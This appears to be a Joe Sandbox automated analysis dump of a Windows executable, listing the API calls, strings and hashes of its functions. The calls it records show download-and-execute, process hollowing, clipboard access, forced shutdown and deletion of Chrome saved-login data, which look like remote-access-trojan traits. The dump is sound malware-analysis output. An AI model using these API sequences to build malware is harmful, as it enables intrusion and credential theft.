                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$??1?$basic_string@$??0?$basic_string@G@2@@std@@$D@1@@G@2@@0@V01@@V?$basic_string@$??9std@@FileFindG@1@@V01@$??4?$basic_string@?c_str@?$basic_string@FirstHstd@@NextV10@Y?$basic_string@
                                                • String ID:
                                                • API String ID: 4126176310-0
                                                • Opcode ID: 84be9581f6f1524c3a2e04d8118c4edc4668b7d8919671c3d8a5f736e409a5ec
                                                • Instruction ID: fe178b748797f2d553296121cb691b44c3610d80c9c14f4dbc5c7040bfc84baf
                                                • Opcode Fuzzy Hash: 84be9581f6f1524c3a2e04d8118c4edc4668b7d8919671c3d8a5f736e409a5ec
                                                • Instruction Fuzzy Hash: 2C41BB7290015DABCF15EFA0DC599DE7778FF18312F1081BAE516A20A0EB74AB49CF58
                                                APIs
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00414970), ref: 0040D359
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002), ref: 0040D380
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D393
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D3AE
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D3B9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003,00000000), ref: 0040D3DB
                                                • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040D3E3
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D3EE
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D3FB
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D408
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041496C), ref: 0040D425
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003,?,?), ref: 0040D457
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D46E
                                                • free.MSVCRT ref: 0040D48C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??1?$basic_string@?c_str@?$basic_string@D@std@@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                                • String ID: open
                                                • API String ID: 2455491495-2758837156
                                                • Opcode ID: 7efe36e6e1e5d25aae5f58f4cd2e1f90ebb62701f54890545eced29a792bebf3
                                                • Instruction ID: dc2c343ad6f5279aff848de4f64d0ef3dec3cf43580c3787717ab218fdc95aee
                                                • Opcode Fuzzy Hash: 7efe36e6e1e5d25aae5f58f4cd2e1f90ebb62701f54890545eced29a792bebf3
                                                • Instruction Fuzzy Hash: 004131B2901119AFDF14AFE1EC999EE777CAF14306F1044BAF502F21E1DE785A448B58
                                                APIs
                                                  • Part of subcall function 0040E7DF: GetCurrentProcess.KERNEL32(00000028,?), ref: 0040E7EC
                                                  • Part of subcall function 0040E7DF: OpenProcessToken.ADVAPI32(00000000), ref: 0040E7F3
                                                  • Part of subcall function 0040E7DF: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040E805
                                                  • Part of subcall function 0040E7DF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040E824
                                                  • Part of subcall function 0040E7DF: GetLastError.KERNEL32 ref: 0040E82A
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00413984), ref: 0040E168
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040E17D
                                                • atoi.MSVCRT(00000000), ref: 0040E184
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,004135D8), ref: 0040E19C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040E1B1
                                                • atoi.MSVCRT(00000000), ref: 0040E1B8
                                                • ExitWindowsEx.USER32(00000000), ref: 0040E1F8
                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState), ref: 0040E20D
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040E214
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00413988), ref: 0040E22B
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041398C), ref: 0040E24C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$??8std@@D@2@@0@D@2@@std@@V?$basic_string@$??1?$basic_string@?c_str@?$basic_string@ProcessTokenatoi$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                • String ID: PowrProf.dll$SetSuspendState
                                                • API String ID: 2658298412-1420736420
                                                • Opcode ID: a315f00547a5687b912f868bcb9920717628d9b85d4a436909961b6bf655cfbd
                                                • Instruction ID: c35befcc3d375dde5ac55abfec913dbb4e682b3ad7d79a195e89e39a48f93aa9
                                                • Opcode Fuzzy Hash: a315f00547a5687b912f868bcb9920717628d9b85d4a436909961b6bf655cfbd
                                                • Instruction Fuzzy Hash: B9316275951216BACF04ABF1EC5ADFE772CAB5075B710487FF502B20D0DE784A408B58
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                                • String ID: {@
                                                • API String ID: 520940213-2098953823
                                                • Opcode ID: 439dbb07643e836846f813bc94a5ba2f7d03a506b6d41fcbd66736f00f55164a
                                                • Instruction ID: 2d71d0b5fceb30af44960321e26e88bff0000f29ffcf8113564fd79c0b3d0115
                                                • Opcode Fuzzy Hash: 439dbb07643e836846f813bc94a5ba2f7d03a506b6d41fcbd66736f00f55164a
                                                • Instruction Fuzzy Hash: D4413E7294421CAADF10EBA0DC88FDE7BBCAB04315F1485A7E605E2050DB759BC5CF58
                                                APIs
                                                • EmptyClipboard.USER32 ref: 0040E269
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040E27A
                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 0040E287
                                                • GlobalLock.KERNEL32(00000000), ref: 0040E291
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040E2A5
                                                • GlobalUnlock.KERNEL32(?), ref: 0040E2CE
                                                • SetClipboardData.USER32(00000001,?), ref: 0040E2D9
                                                • CloseClipboard.USER32 ref: 0040E2F2
                                                • OpenClipboard.USER32 ref: 0040E2F9
                                                • GetClipboardData.USER32(00000001), ref: 0040E309
                                                • GlobalLock.KERNEL32(00000000), ref: 0040E312
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040E31B
                                                • CloseClipboard.USER32 ref: 0040E321
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 0040E33A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClipboardV?$allocator@$D@2@@std@@D@std@@GlobalU?$char_traits@$??1?$basic_string@CloseDataLockUnlock$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@AllocD@1@@EmptyOpen
                                                • String ID: p6A
                                                • API String ID: 3947674868-595022129
                                                • Opcode ID: e7d81bfc7f67cb270c73a8b13ae07536e37c400bb97724a1a3df4d7222808653
                                                • Instruction ID: c48fe3532f424c4c1f3264ad02959e16e860e3474de28d5f21c86c50b1dc4375
                                                • Opcode Fuzzy Hash: e7d81bfc7f67cb270c73a8b13ae07536e37c400bb97724a1a3df4d7222808653
                                                • Instruction Fuzzy Hash: B22144716001059BDB05AFB5ED5D5FE7BA9FB44302B00847AF503E22E1DF398A04CB68
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0040EDEE
                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,00419958,00000000,75922EE0), ref: 0040EE0A
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040EE11
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040EE64
                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040EE7C
                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0040EE91
                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040EEB3
                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040EEDE
                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0040EF00
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040EF41
                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040EF62
                                                • SetThreadContext.KERNEL32(?,?), ref: 0040EF7B
                                                • ResumeThread.KERNEL32(?), ref: 0040EF88
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                                • String ID: NtUnmapViewOfSection$ntdll.dll
                                                • API String ID: 65594003-1050664331
                                                • Opcode ID: bdd21d3a253677f4dddc1d0a5f597e8ba1dae0e69475547475e527f32612771e
                                                • Instruction ID: d50f2b51f192825980c78eefd926c059703a4cda61a9207a8cf544a2fd66dd4c
                                                • Opcode Fuzzy Hash: bdd21d3a253677f4dddc1d0a5f597e8ba1dae0e69475547475e527f32612771e
                                                • Instruction Fuzzy Hash: 79518871A00305BFDB209F69CC45FAABBB9EF44705F20442AFA44EB2A1D7759911CB18
                                                APIs
                                                • getenv.MSVCRT ref: 0040645C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406467
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406472
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040647D
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406486
                                                • DeleteFileA.KERNEL32(00000000), ref: 0040648D
                                                • GetLastError.KERNEL32 ref: 00406497
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],?,?,?,?,00000000), ref: 004064B8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004064CB
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],?,?,?,?,00000000), ref: 004064F1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 00406506
                                                Strings
                                                • [Chrome StoredLogins found, cleared!], xrefs: 004064EC
                                                • [Chrome StoredLogins not found], xrefs: 004064B3
                                                • UserProfile, xrefs: 00406457
                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00406451
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                • API String ID: 3740952235-1062637481
                                                • Opcode ID: 81aff7be51fa266aee90db2a0eec8a84f0a04648dbe5a01e4c4198d192b404fa
                                                • Instruction ID: ff5ace8db5db9424754ab0338091e6503ebdde2b7caff9f9140975201375651d
                                                • Opcode Fuzzy Hash: 81aff7be51fa266aee90db2a0eec8a84f0a04648dbe5a01e4c4198d192b404fa
                                                • Instruction Fuzzy Hash: B4115175640108ABDB04BFA4DD5EAEF7738EB05302F508066E402F21D0EE789B58C7AA
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00419D80,[INFO],00419288,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF), ref: 004020E2
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 004020EF
                                                • malloc.MSVCRT ref: 004020FC
                                                • recv.WS2_32(00419D80,00000000,00000000,00000000), ref: 0040210D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402121
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 0040212B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402134
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402141
                                                  • Part of subcall function 0040219E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00419D80,00000000), ref: 004021B0
                                                  • Part of subcall function 0040219E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 004021C8
                                                  • Part of subcall function 0040219E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004021D7
                                                  • Part of subcall function 0040219E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004021E1
                                                  • Part of subcall function 0040219E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 004021FA
                                                  • Part of subcall function 0040219E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402203
                                                  • Part of subcall function 0040219E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00419DB4), ref: 00402222
                                                  • Part of subcall function 0040219E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402242
                                                  • Part of subcall function 0040219E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 0040225A
                                                  • Part of subcall function 0040219E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040226C
                                                  • Part of subcall function 0040219E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6C995E04), ref: 00402282
                                                  • Part of subcall function 0040219E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040228C
                                                  • Part of subcall function 0040219E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402295
                                                  • Part of subcall function 0040219E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004022A6
                                                  • Part of subcall function 0040219E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004022B0
                                                  • Part of subcall function 0040219E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004022B9
                                                  • Part of subcall function 0040219E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004022CD
                                                • free.MSVCRT ref: 00402162
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 00402184
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040C51C,0040C5BF,00000001), ref: 0040218D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                                • String ID: [INFO]
                                                • API String ID: 2200674315-4019176272
                                                • Opcode ID: 741893b63d31f3309f36e500531a00c1c7307a5c4bbb362c6c1d5134d433a73a
                                                • Instruction ID: 249c07bb62346c768de4153345167ba21387d24338bd6db9d5784eeadd8e2c5b
                                                • Opcode Fuzzy Hash: 741893b63d31f3309f36e500531a00c1c7307a5c4bbb362c6c1d5134d433a73a
                                                • Instruction Fuzzy Hash: B0212F32500109ABCB11EFA0DE99AEE7779FF44706F10407AF502A2190DB75AB09CB58
                                                APIs
                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0040C809
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 0040C81F
                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(00414A50,00000000,00000002), ref: 0040C831
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 0040C83C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040C84B
                                                  • Part of subcall function 004035C3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004035D1
                                                  • Part of subcall function 004035C3: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004035DA
                                                  • Part of subcall function 004035C3: GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 004035F2
                                                  • Part of subcall function 004035C3: _itoa.MSVCRT ref: 004035F9
                                                  • Part of subcall function 004035C3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 0040360F
                                                  • Part of subcall function 004035C3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403617
                                                  • Part of subcall function 004035C3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00403626
                                                  • Part of subcall function 004035C3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00403633
                                                  • Part of subcall function 004035C3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040363F
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403648
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403651
                                                  • Part of subcall function 004035C3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040365A
                                                  • Part of subcall function 004035C3: lstrlenA.KERNEL32(00000000), ref: 00403661
